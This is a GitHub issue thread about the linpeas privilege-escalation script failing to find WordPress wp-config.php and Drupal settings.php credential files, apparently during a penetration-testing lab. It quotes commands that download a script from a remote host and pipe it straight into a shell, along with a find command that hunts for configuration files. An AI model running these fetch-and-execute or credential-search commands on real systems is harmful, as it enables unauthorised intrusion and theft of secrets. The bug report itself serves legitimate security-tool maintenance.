### ISSUE TITLE
wp-config.php Not Found

### ISSUE THREAD

**Issue by godylockz** [carlospolop/privilege-escalation-awesome-scripts-suite#138]
Running linpeas.sh, it was unable to find wp-config.php located in /var/www/wp-config.php. It was also unable to find the "FastCGI Params" as well.

[+] Searching Wordpress wp-config.php files
wp-config.php Not Found

```sh
www-data@hostname:/var/www$ ls -la
total 172
drwxr-xr-x  5 www-data www-data  4096 2021-05-20 23:00 .
drwxr-xr-x 16 root     root      4096 2021-05-20 23:00 ..
-rw-r--r--  1 www-data www-data   395 2021-05-20 23:00 index.php
-rw-r--r--  1 www-data www-data 19929 2021-05-20 23:00 license.txt
-rw-r--r--  1 www-data www-data  9177 2021-05-20 23:00 readme.html
-rw-r--r--  1 www-data www-data  4663 2021-05-20 23:00 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 2021-05-20 23:00 wp-admin
-rw-r--r--  1 www-data www-data   271 2021-05-20 23:00 wp-blog-header.php
-rw-r--r--  1 www-data www-data  3522 2021-05-20 23:00 wp-comments-post.php
-rw-r--r--  1 www-data www-data  3365 2021-05-20 23:00 wp-config.php
-rw-r--r--  1 www-data www-data  3177 2021-05-20 23:00 wp-config-sample.php
drwxr-xr-x  4 www-data www-data  4096 2021-05-20 23:00 wp-content
-rw-r--r--  1 www-data www-data  2718 2021-05-20 23:00 wp-cron.php
drwxr-xr-x  9 www-data www-data  4096 2021-05-20 23:00 wp-includes
-rw-r--r--  1 www-data www-data  1997 2021-05-20 23:00 wp-links-opml.php
-rw-r--r--  1 www-data www-data  2408 2021-05-20 23:00 wp-load.php
-rw-r--r--  1 www-data www-data 29310 2021-05-20 23:00 wp-login.php
-rw-r--r--  1 www-data www-data  7723 2021-05-20 23:00 wp-mail.php
-rw-r--r--  1 www-data www-data  9899 2021-05-20 23:00 wp-settings.php
-rw-r--r--  1 www-data www-data 18219 2021-05-20 23:00 wp-signup.php
-rw-r--r--  1 www-data www-data  3700 2021-05-20 23:00 wp-trackback.php
-rw-r--r--  1 www-data www-data  2719 2021-05-20 23:00 xmlrpc.php
```

**Comment by godylockz** [comment]
This was working in the past, not sure what has changed to affect this enumeration.

**Comment by carlospolop** [comment]
Hey @godylockz,
Thank you very much for letting me know!
There was a very silly mistake that prevented linpeas to find several files. This should be working again in the latest version!

**Comment by godylockz** [comment]
@carlospolop Thanks!
I tried it again v3.2.1 as soon as you closed this.
So I currently am not on a wordpress box, but will test it again when I am. However, I am on a drupal box right now and this appears to not be working. Not sure if its tied to the same thing. I was doing a diff of when it did work previously, to see if I could find something easy:
https://www.diffchecker.com/NBmQnLUp

[+] Searching Drupal settings.php files
/default/settings.php Not Found

ls -la /var/www/html/sites/default/settings.php
-r-xr-xr-x 1 www-data www-data 26558 Apr 19  2018 /var/www/html/sites/default/settings.php

Unless the searching for drupal settings.php is non-recursive?

Not sure if you can reopen this issue, or want me to look into this further. Let me know.

**Comment by carlospolop** [comment]
Hey mate!
I don't know what to say, using the latest version I found both drupal and wordpress files:
![image](https://user-images.githubusercontent.com/17181413/119277716-810d3080-bc21-11eb-9e1e-255aeaa81b3d.png)

Could you retry or let me know if the search `find /var -name settings.php 2>/dev/null | grep '/default/settings.php'` works in that box to find the file?

**Comment by godylockz** [comment]
Okay @carlospolop  found-out something ... Not sure how to make it work ... but if I run it like so:
```
reset; curl 192.168.49.96/linpeas.sh | bash -s -- -q
```
It doesn't work ....
v 3.2.1:
![image](https://user-images.githubusercontent.com/81207744/119278032-daa93700-bbf0-11eb-8894-67c6255bc712.png)

HOWEVER, If i run it like so ....
It works fine when I run it on disk:
```
wget 192.168.49.96/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
v3.2.1:
![image](https://user-images.githubusercontent.com/81207744/119278183-a4b88280-bbf1-11eb-8466-77cec2468d6a.png)

So not sure if its "coded" to work like piping it into bash like that / not running from disk. Might be worth a warning or something? Let me know if you can reproduce / what your thinking.
Sorry for the confusion. I'm going to run it from disk from now on!

**Comment by carlospolop** [comment]
In order to run linpeas from github in the linpeas readme you can find this suggestion `curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh`
I have checked that using that command line the files are also found, so consider using that better.

**Comment by godylockz** [comment]
@carlospolop Thank you for your help! Really appreciate it.
